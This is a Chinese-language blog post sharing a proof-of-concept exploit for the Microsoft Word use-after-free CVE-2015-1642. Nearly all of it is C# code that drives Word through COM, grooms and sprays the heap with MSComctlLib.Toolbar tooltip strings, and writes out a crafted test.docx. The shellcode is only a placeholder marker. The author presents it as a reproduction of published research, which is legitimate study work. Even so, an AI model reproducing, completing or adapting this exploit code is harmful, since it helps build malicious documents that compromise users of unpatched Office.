CVE-2015-1642 POC

  月初,玄武实验室的“每日安全动态”推送了一篇office UAF漏洞利用的文章,之前对office上UAF漏洞利用占位问题有些疑问,刚好就借助这篇文章重现了一下。其中堆喷射部分不是特别稳定,漏洞成因和利用的细节请参见原文链接。今天想起来,就把POC发这里吧。

  原文链接:Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642 CTaskSymbol UAF by @ d0mzw https://t.co/NPJUJUqNSH

  1 namespace WindowsFormsApplication1
  2 {
  3     public partial class Form1 : Form
  4     {
  5         public Form1()
  6         {
  7             InitializeComponent();
  8         }
  9 
 10         private void HeapSpray(Word.Document objDoc)
 11         {
 12             Word.InlineShape[] ocx = new Word.InlineShape[30];
 13             MSComctlLib.Toolbar[,] toolbarArray = new MSComctlLib.Toolbar[30, 2];
 14 
 15             int block_size = 0x1000;
 16 
 17             string padding = "\u8080\u8080";
 18             while (padding.Length < 0x1000)
 19             {
 20                 padding += "\u2121\u2121";
 21             }
 22             padding = padding.Substring(0, (0x9f2 - 0xc) / 2);
 23 
 24             // 0a0a0a0a points here 
 25             string shellcode = "\uC0DE\uC0DE";
 26            
 27             string pattern = "\u9090\u9090";
 28             while (pattern.Length < block_size)
 29             {
 30                 pattern += pattern;
 31             }
 32             pattern = pattern.Substring(0, 0x800 - padding.Length - shellcode.Length);
 33 
 34             string block = padding + shellcode + pattern;
 35             while (block.Length < 0xfffe0 / 2)
 36             {
 37                 block += block;
 38             }
 39 
 40             string chunk = block.Substring(0, (0xfffe0 - 0x6) / 2);
 41 
 42             //MessageBox.Show("[+] objAlloc size: 0x" + (chunk.Length * 0x2 + 0x4 + 0x2).ToString("X"));
 43 
 44             for (int i = 0; i < 30; i++)
 45             {
 46                 ocx[i] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");
 47                 for (int j = 0; j < 2; j++)
 48                 {
 49                     toolbarArray[i, j] = ((MSComctlLib.Toolbar)ocx[i].OLEFormat.Object);
 50                     toolbarArray[i, j].Buttons.Add().ToolTipText = chunk;
 51                 }
 52             }
 53         }
 54 
 55         private void DefragmenHeap(Word.Document objDoc, Word.InlineShape[] ocx)
 56         {
 57             string paddingB = "\u0c0c\u0c0c";
 58             while (paddingB.Length < 0x60 / 2)
 59             {
 60                 paddingB += paddingB;
 61             }
 62             string objAllocB = paddingB.Substring(0, 0x5a / 2);
 63             
 64             MSComctlLib.Toolbar[] tabArrayB = new MSComctlLib.Toolbar[16];
 65             ocx[2] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");
 66 
 67             for (int j = 0; j < 16; j++)
 68             {
 69                 tabArrayB[j] = (MSComctlLib.Toolbar)ocx[2].OLEFormat.Object;
 70                 tabArrayB[j].Buttons.Add().ToolTipText = objAllocB;
 71             }
 72 
 73             MSComctlLib.Toolbar[] tabArrayC = new MSComctlLib.Toolbar[16];
 74             ocx[3] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");
 75 
 76             for (int j = 0; j < 16; j++)
 77             {
 78                 tabArrayC[j] = (MSComctlLib.Toolbar)ocx[3].OLEFormat.Object;
 79                 tabArrayC[j].Buttons.Add().ToolTipText = objAllocB;
 80             }
 81         }
 82 
 83         private void ReplaceHeap(Word.Document objDoc, Word.InlineShape[] ocx)
 84         {
 85             string paddingA = "\u0a06\u0a0a";
 86             while (paddingA.Length < 0x60 / 2)
 87             {
 88                 paddingA += paddingA;
 89             }
 90             string objAllocA = paddingA.Substring(0, 0x5a / 2);
 91 
 92             MSComctlLib.Toolbar[] tabArrayA = new MSComctlLib.Toolbar[16];
 93             ocx[0] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");
 94 
 95             for (int j = 0; j < 16; j++)
 96             {
 97                 tabArrayA[j] = (MSComctlLib.Toolbar)ocx[0].OLEFormat.Object;
 98                 tabArrayA[j].Buttons.Add().ToolTipText = objAllocA;
 99             }
100         }
101 
102         private void button1_Click(object sender, EventArgs e)
103         {
104             Word.Application objWord = new Word.Application();
105             objWord.Visible = true;
106 
107             object objMissing = System.Reflection.Missing.Value;
108             Word.Document objDoc = objWord.Documents.Add(ref objMissing, ref objMissing, ref objMissing, ref objMissing);
109             
110             // How to: Programmatically Insert Text into Word Documents;
111             // https://msdn.microsoft.com/en-us/library/6b9478cs.aspx 
112             
113             Word.InlineShape[] ocx = new Word.InlineShape[4];
114 
115             ReplaceHeap(objDoc, ocx);
116             
117             ocx[1] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");
118 
119             DefragmenHeap(objDoc, ocx);
120 
121             HeapSpray(objDoc);
122 
123             // Null out the reference 
124             object filename = Application.StartupPath + @"\test.docx";
125             objDoc.SaveAs2(ref filename);
126             objDoc.Close(ref objMissing, ref objMissing, ref objMissing);
127             objDoc = null;
128             objWord.Quit(ref objMissing, ref objMissing, ref objMissing);
129             objWord = null;
130         }
131     }
132 }

 

posted @ 2015-11-28 19:27 Danny__Wei 阅读(...) 评论(...) 编辑 收藏